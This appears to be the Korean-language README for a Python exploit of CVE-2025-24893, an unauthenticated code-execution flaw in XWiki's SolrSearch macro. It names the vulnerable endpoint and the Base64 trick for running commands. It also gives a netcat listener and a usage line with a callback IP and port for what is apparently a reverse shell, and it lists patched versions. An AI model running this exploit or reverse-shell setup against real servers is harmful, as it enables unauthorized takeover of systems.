
XWiki에서의 원격 코드 실행 (RCE) 익스플로잇
XWiki 원격 코드 실행 (RCE) 익스플로잇
CVE-2025-24893에 대한 Python3 익스플로잇입니다. 이는 XWiki 플랫폼에 영향을 미치는 중요한 인증되지 않은 원격 코드 실행(RCE) 취약점입니다.
이 스크립트는 SolrSearch 매크로 구성 요소 내의 코드/표현식 인젝션 취약점(CWE-95)을 익스플로잇합니다. 이 결함으로 인해 공격자는 기본 운영 체제에서 임의의 Groovy/Java 코드를 실행할 수 있습니다. 이 익스플로잇은 Java의 Runtime.getRuntime().exec() 함수의 명령 해석 제한을 우회하기 위해 Base64 인코딩을 자동으로 수행합니다.
/bin/get/Main/SolrSearch (text 매개변수를 통해)nc -lvnp 4444
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>
예시:
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
requests 라이브러리필요한 종속성을 설치하려면:
pip install requests
XWiki 인스턴스를 공식 수정 버전인 15.10.11, 16.4.1, 16.5.0-rc-1(이상) 중 하나로 업데이트하십시오.
이 스크립트는 교육 목적, 승인된 보안 감사 및 침투 테스트용으로만 개발되었습니다. 저자는 이 도구의 부적절한 사용, 손해 또는 불법 활동에 대해 책임을 지지 않습니다. 사전 승인 없이 이 스크립트를 대상에 사용하는 것은 엄격히 불법입니다.